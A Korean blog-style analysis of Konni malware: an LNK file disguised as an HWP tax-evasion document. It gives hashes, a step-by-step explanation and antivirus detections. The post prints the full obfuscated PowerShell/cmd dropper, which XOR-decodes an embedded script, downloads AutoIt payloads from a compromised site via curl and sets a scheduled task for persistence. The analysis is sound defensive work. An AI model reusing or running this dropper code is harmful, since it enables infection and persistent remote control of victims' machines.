탈세제보로 위장한 Konni(코니) 에서 만든 악성코드-첨부1_소명자료 목록(탈세제보)(2024.4.5)

오늘도 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 첨부1_소명자료 목록(탈세제보)(2024.4.5)에 대해 알아보는 시간을 가져 보겠습니다.
해당 악성코드는 hwp 즉 한글과 컴퓨터에서 만든 HWP 첨부 파일처럼 돼 있는 lnk 파일이며 해당 악성코드를 hwp 즉 한글과 컴퓨터에서 만든 HWP 로 생각을 하고 실행을 하면 PowerShell(파워셀)를 통해서 해당 악성코드가 동작하게 구성이 돼 있습니다. 먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:첨부1_소명자료 목록(탈세제보).hwp.lnk
사이즈:136 KB
MD5:9d6c79c0b395cceb83662aa3f7ed0123
SHA-1:65f5f7d127c478522e9669200de20000edcb6cfb
SHA-256:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e

악성코드에 포함이 된 파워셀 코드

PowerShell 코드

c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQ(A)cjvWqTWLATHZCqoATzG
(z)vpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESU
RkbbEfWgcLVep(X)BQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHj
uQNHCakQwkvfexCFsKuzAkzcXvpnd(N)HJbTQQnPxsGyzEJuYXSEMtbgHipKLg
LYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodja
bnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgEC(k0)
dcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtS
aeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxr
BrsSqjZJHwfNQjydVdr(T)VcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmn
GwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgb
BFCaLZNMVAQjVBLRqGW(T)MdpheNRzqKXTtTzqKa(S)mkkTkTeqPo(u)YEonoypuVXim
vkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBws
KhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMk(s)SGUwHrgGnFGcAHKutaNdpAThEKYGN(a)ZxWa
eruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGz
wCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgV(A)KRaWkbbpPeRYizaNJbWzqALF
fEn(b)cHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnm
LaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden funct(i)on JogMjclR
PK(){$zPedYniBf(y)=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-o
bject{$_.length -eq 0(x)0002233E};$nJlRQzeAUMCXVjArUNw(=)$zPedYniBfy;$z
PedYniBfy(=)$zPedYniBfy^(|)Select-Object -ExpandProperty (N)ame;if($zPe
dYniBfy(.)length -eq 0){cd $env:TE(M)P;$zPedYniBfy=Get-ChildItem  *.lnk
;$zP(e)dYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$n
JlR(Q)zeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object
-ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};func
tion pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$z(P)edYniBfy=$dj(L)utZCNrS[0]
;$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPed
YniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEo(T)XlI=JogMjc
lR(P)K;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]:
:new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[Sy(
s)tem.IO.FileAcc(e)ss]::ReadWrite,[System.IO.FileShare]::None));try{$Cv
ytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKL
tldjopW=$CvytSiJOHD.ReadByte(s)(0x00006C00);}finally{$CvytSiJOHD.Close(
)};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++)
{ $fKLtldjopW[$nJlRQzeAUM]=$f(K)LtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[Sys
tem.IO.File]::WriteAllBytes($djLutZ(C)NrS,$fKLtldjopW);$oE(e)fgawPUH='.
\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQ
aW;$WrKnPB(w)fdh=JogMjclRPK;remov(e)-item -path $WrKnPBwfdh[1] -force;&
mkdir c:\GSlLzFnTov & attrib (+)h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov (
&) copy c:\windows\system32\curl(.)exe GSlLzFnTov(.)exe & GSlLzFnTov -k
(-o AutoIt3(.)exe https://jethropc(.)com/wp-admin/css/temp/hurry/?rv=pap
ago^&za=honey0 (&) GSlLzFnTov -k (-)o QwbpjvdmTA(.)au3
https://jethropc(.)com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & 
(s)c^htas^ks /cre(a)te /sc m(i)nute /mo 1 /tn "Qwb(p)jvdmTA"
/tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    iconlocation: (.)hwp
}

코드 설명

이번에는 일단 코드에 보면 인터넷 주소가 있는데 미국 아칸소주 프랭클린 카운티에 있는 도시인 오자크(Ozark)에 있는 한 교회 사이트를 해킹해서 사용했으며 파파고 번역기로 연결을 한 것으로 추측됩니다.
해당 코드는 다음과 같은 과정을 통해 동작합니다.
1.Get-ChildItem *.lnk:현재 디렉토리에서 확장자가. lnk 인 파일을 모두 가져옴
2.where-object{$_.length -eq 0x0002233E}:파일들 중에서 길이가 0x0002233E(16진수)인 파일만 필터링
3.$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name:필터링된 파일들의 이름을 가져옴
4.$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4):파일 이름에서 확장자를 제거
5.$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO(.)File]::open($zPedYni(B)fy,[System.IO(.)FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None)):해당 파일을 이진 리더(Binary Reader)로 엽니다.

Powershell 코드 실행

6.$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin):파일 내에서 특정 위치(0x00001DA5)로 이동
7.$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00):해당 위치부터 0x00006C00(16진수)바이트를 읽어옴
8.XOR 연산: 읽어온 바이트 데이터에 대해 XOR(Exclusive OR) 연산을 수행
XOR 연산은 비트 단위로 수행되며 각 비트가 같으면 0, 다르면 1을 반환

ProcessExplorer 본 악성코드 Powershell 코드 실행

$fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8:각 바이트에 대해 0xD8과 XOR 연산을 수행하고 이렇게 함으로써 데이터를 변조
9.[System.IO(.)File]::WriteAllBytes($djLutZC(N)rS,$fKLtldjopW):변조된 데이터를 원본 파일에 다시 씀
10. $oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH:새로 작성된 스크립트 파일을 실행
이러한 과정을 통해 코드는 시스템에서 특정한 조건을 만족하는 링크 파일을 찾고, 해당 파일을 열어 데이터를 변조하고 다시 저장하며
&mkdir c:\GSlLzFnTov: mkdir 명령어를 사용하여 새로운 디렉토리를 만들며 여기서는 c:\GSlLzFnTov라는 디렉토리를 생성
attrib +h c:\GSlLzFnTov: attrib 명령어를 사용하여 디렉토리의 속성을 변경
여기서는 +h 옵션을 사용하여 해당 디렉토리를 숨김
cd /d c:\GSlLzFnTov: cd 명령어를 사용하여 해당 디렉토리로 이동
hxxps://jethropc(.)com/wp(-)admin(/)css/temp(/)hurry/?rv=papago^&za=honey0:해당 부분은 웹 사이트에서 파일을 다운로드하기 위한 URL
여기서는 papago 와 honey0 라는 매개변수를 사용하여 다운로드할 파일을 지정
11.GSlLzFnTov -k -o QwbpjvdmTA.au3: 해당 부분은 다운로드된 파일을 실행하는 명령어
파일 이름은 QwbpjvdmTA.au3

악성코드가 생성한 GSlLzFnTov 폴더 및 악성코드 파일

12.sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3:해당 부분은 Windows 작업 스케줄러를 사용하여 매분 실행되는 작업을 만들며 해당 작업은 QwbpjvdmTA 라는 이름으로 만들어지며 c:\GSlLzFnTov\AutoIt3.exe 와 c:\GSlLzFnTov\QwbpjvdmTA.au3 파일을 실행이 작업은 1분마다 실행되도록 설정되어 있습니다. 
iconlocation:.hwp는 아이콘의 위치를.hwp 파일로 설정

악성코드 실행 되는 소명 자료 목록

2024-04-24 05:33:32 UTC 기준 바이러스토탈 에서 탐지하는 보안 업체들은 다음과 같습니다.
Arcabit:Heur.BZC.YAX.Pantera.3049.815F5292 [many]
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
BitDefender:Heur.BZC.YAX.Pantera.3049.815F5292
Emsisoft:Heur.BZC.YAX.Pantera.3049.815F5292 (B)
eScan:Heur.BZC.YAX.Pantera.3049.815F5292
ESET-NOD32:A Variant Of Generik.GHBFVCD
GData:Heur.BZC.YAX.Pantera.3049.835717DA
Google:Detected
Gridinsoft (no cloud):Susp.Obfuscted_PowerShell_Code.C.sd!yf
Kaspersky:HEUR:Trojan.WinLNK.Agent.gen
MAX:Malware (ai Score=86)
McAfee:Artemis!9D6C79C0B395
Rising:Trojan.EmbPs/LNK!1.F9CB (CLASSIC)
Skyhigh (SWG):BehavesLike.Trojan.cb
Sophos:Mal/PowLnkObf-D
Symantec:CL.Downloader!gen20
Trellix (FireEye):Heur.BZC.YAX.Pantera.3049.815F5292
VBA32:Trojan.Link.Crafted
ZoneAlarm by Check Point:HEUR:Trojan.WinLNK.Agent.gen
Zoner:Probably Heur.LNKScript
해당 파일을 실행하며 국가법령정보센터에 있는 국세징수법 시행규칙 [별지 제99호서식] 파일을 실행해서 실제로 국제징수법에 의한 소명자료인 것을 동작하지만 실제로는 파워셀로 통해서 악성코드를 실행하는 것을 확인할 수가 있습니다.
즉 우리 북한은 항상 한국 국민의 소중한 개인정보 및 금융 정보 등을 훔쳐서 무기 개발이나 비자금 축적에 이용되는 것이 아닐까 조심스럽게 생각이 됩니다. 아무튼, 북한은 사이버상에서도 한국의 민감한 자료들에 접근하려고 하고 있습니다. 그리고 자신이 관리 하고 있는 사이트들은 정기적인 점검을 통해서 이렇게 악성코드 유포지로 사용되는 것을 막아야겠습니다.